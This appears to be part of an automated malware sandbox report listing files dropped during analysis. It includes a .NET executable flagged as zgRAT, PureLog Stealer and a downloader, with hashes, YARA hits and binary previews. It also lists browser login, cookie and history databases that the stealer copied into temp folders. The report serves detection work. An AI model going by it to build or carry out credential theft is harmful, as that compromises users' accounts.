                                                                                                                                                                                                                                        Preview:PK........L..X................Cookies\..PK........L..X..E.............Cookies\Chrome_Default.txt....P.@.5.....d...`|L2J1l.. .3."_..N.......q..b..=../c.;{.........4F8...0..Y.........Z}Y.g.<w3.f.W(....K.o..l...!*.......y.o;.F..5%.....|0MS.....J.,....../.o...8.H...,M.......;.....I!.z.W....j...e....fE.?.X....6...g...skL.K.85b.U.5...[/.<.h....C..|...C5"{..i.$...'..W).f.O.i..4.....L..Z..t.Z(].2.m.?..<....]........f..I3?.q..8U.6...8.N.y_#Vb...g.k?.Z1.!.3$.....\.%...PK........L..X...............information.txt.X.O.F.....a........<....K...j......9v.v .....:>..^...gfg~.m..m..c.H.8.6.|.E...../.....a...f...@.!J..)G.S>...c....c.h..B..H.p.%.E./F>.,.\.X...ok..B.".8....#B.......B.%....;.\...L0..>Q.K.k..4.....N.R.8ga.8F...m..<..2..........Q.>......'..<P..Nx...wz8..o.CR./=U..^.......8..R......<@..I<..pP..LHo..*..*........m./.4-O.h...,..1....F."G.;....&.z..t.~.......r.wu.......Dj.{v..2...4|A...m..P.w......f.m...:.M.....e..E.....U.....6K*...I....)z..j......E.;...

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59721128
                                                                                                                                                                                                                                        Entropy (8bit):7.894297326209827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1572864:JLZ1CnPCEBSFRBOf4E/wGfVRMTytvAavLTr:VCnPCbFRBDgzVftvh
                                                                                                                                                                                                                                        MD5:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                        SHA1:0DD19EA3C791BB453AB530CA65CA12A680E67B65
                                                                                                                                                                                                                                        SHA-256:02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
                                                                                                                                                                                                                                        SHA-512:D7FAEF92E675064375B1D1CC13F326FED60673B32FAAED5C33EF5255890A72C031E9C5F1B86D2801774E2E47F9A5CD16C66C54398954F57336B07EEAA0E9E49E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, Author: ditekSHen
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ;..........."...0.....V.......... ........@.. ..............................Tp....`....................................O.......|S...............)...`.........8............................................ ............... ..H............text....... ..................... ..`.rsrc...|S.......T.................@..@.reloc.......`......................@..B.......................H.......|...........q...d....P...........................................r...psR........~.....o^........*.s.........~....~D...%-.&~C.........s....%.D...o....*...0..K........r...p}.....(....o....o....o....}#....(.....r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r;..pr...pr...prA..p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p(

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):59721128
                                                                                                                                                                                                                                        Entropy (8bit):7.894297326209827
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1572864:JLZ1CnPCEBSFRBOf4E/wGfVRMTytvAavLTr:VCnPCbFRBDgzVftvh
                                                                                                                                                                                                                                        MD5:8E9C467EAC35B35DA1F586014F29C330
                                                                                                                                                                                                                                        SHA1:0DD19EA3C791BB453AB530CA65CA12A680E67B65
                                                                                                                                                                                                                                        SHA-256:02FA8D1A57CF9AAB766303A3436E6CC4AE6AAA3348549A6E218437E7D10DC134
                                                                                                                                                                                                                                        SHA-512:D7FAEF92E675064375B1D1CC13F326FED60673B32FAAED5C33EF5255890A72C031E9C5F1B86D2801774E2E47F9A5CD16C66C54398954F57336B07EEAA0E9E49E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ;..........."...0.....V.......... ........@.. ..............................Tp....`....................................O.......|S...............)...`.........8............................................ ............... ..H............text....... ..................... ..`.rsrc...|S.......T.................@..@.reloc.......`......................@..B.......................H.......|...........q...d....P...........................................r...psR........~.....o^........*.s.........~....~D...%-.&~C.........s....%.D...o....*...0..K........r...p}.....(....o....o....o....}#....(.....r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r;..pr...pr...prA..p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p( ...&.r...pr...pr...pr...p(

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\rage131MP.tmp

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                                                        Entropy (8bit):2.66122625626979
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:Lion:Bn
                                                                                                                                                                                                                                        MD5:D8955F279D4EF1FDB640FD1F38A4F19E
                                                                                                                                                                                                                                        SHA1:5591E561F0130B6867589CEE4902DCBC85B1AB47
                                                                                                                                                                                                                                        SHA-256:C19B9FB1FC28FE46083EC9D8D8F8D0C239B7B1D472D239DF62931930AF4393F2
                                                                                                                                                                                                                                        SHA-512:032CA308BD227709AAA1212E7701717A08EFC71D8865D01A5482E772884BD42DED21B6AB7E0717C4BA50F54C8CB1A4589B6E5D42D3DD615C64B071A7956CE5DE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1713906798700

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\02zdBXl47cvzcookies.sqlite

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\1tMQdk_m1hNqWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\3F8xdMXSM6gVWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\3b6N2Xdh3CYwplaces.sqlite

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\AgnbFJmDkw4DWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\BUaWru1OY9dqLogin Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\BiKteJAFTArSLogin Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\D87fZN3R3jFeplaces.sqlite

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\H4jv9ryDgviIWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\KZl1PnKZSQCUHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.7373485529776095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
                                                                                                                                                                                                                                        MD5:6E23040642D39AE5B8BFCF488BF08AEC
                                                                                                                                                                                                                                        SHA1:F8AADA3F00165FEB51AB2021906289C73216E572
                                                                                                                                                                                                                                        SHA-256:C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
                                                                                                                                                                                                                                        SHA-512:46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\LwOohb0OofEKLogin Data For Account

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\Nsl376dgwgQLCookies

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                        Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\WCP7PKc3RGBwHistory

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                                        Entropy (8bit):0.7373485529776095
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ISby5bHgtH+bF+UI3iN0RSV0k3qLyj9mJz:YlAtIkUI3iGRE3qLO6
                                                                                                                                                                                                                                        MD5:6E23040642D39AE5B8BFCF488BF08AEC
                                                                                                                                                                                                                                        SHA1:F8AADA3F00165FEB51AB2021906289C73216E572
                                                                                                                                                                                                                                        SHA-256:C2CD94B96B62B72BC989CB7C266FDA787FFA6BFB57B80A2976FE39EBD1F8C786
                                                                                                                                                                                                                                        SHA-512:46D9DEC9D1532B0800EEF979EF213C94652ABE7FF212B783E7E45D0F91E5D48D879FD3F0E2D2BBEA9AB78EE0F4D217BA0F8CCD19F757703E9B1E4FFC8CD63473
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\spanR5OV7OYq0nWL\YLMJt9Fewg2TWeb Data

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exe
